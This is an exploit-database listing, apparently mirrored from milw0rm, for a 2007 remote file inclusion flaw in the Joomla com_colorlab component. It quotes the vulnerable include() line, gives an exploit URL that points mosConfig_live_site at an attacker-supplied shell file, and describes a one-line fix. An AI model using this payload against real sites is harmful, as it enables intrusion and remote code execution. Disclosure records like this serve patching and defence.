[] NeoSense
E X P L O I T S
title author type platform port cve id

Joomla! Component com_colorlab 1.0 - Remote File Inclusion

Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2007-10-11 
date_updated: 2007-10-12 
verified: 1 
codes: OSVDB-40609;CVE-2007-5451 
tags: 
aliases:  
screenshot_url:  
application_url: 
--------------------

Joomla com_colorlab Remote File Include

--------------------

Found : xoron

--------------------

Download:
http://download.joomlaportal.ch/content/view/474/

--------------------

Wrong Code:
include( "$mosConfig_live_site/components/com_color/about.html" );

--------------------

Exploit:
/administrator/components/com_color/admin.color.php?mosConfig_live_site=shell?

--------------------

How to Fix:
1-open admin.colo.php
2-write this codes before wrong codes

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

3-save and exit

--------------------

Thanx: mdx :)

--------------------

# milw0rm.com [2007-10-12]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.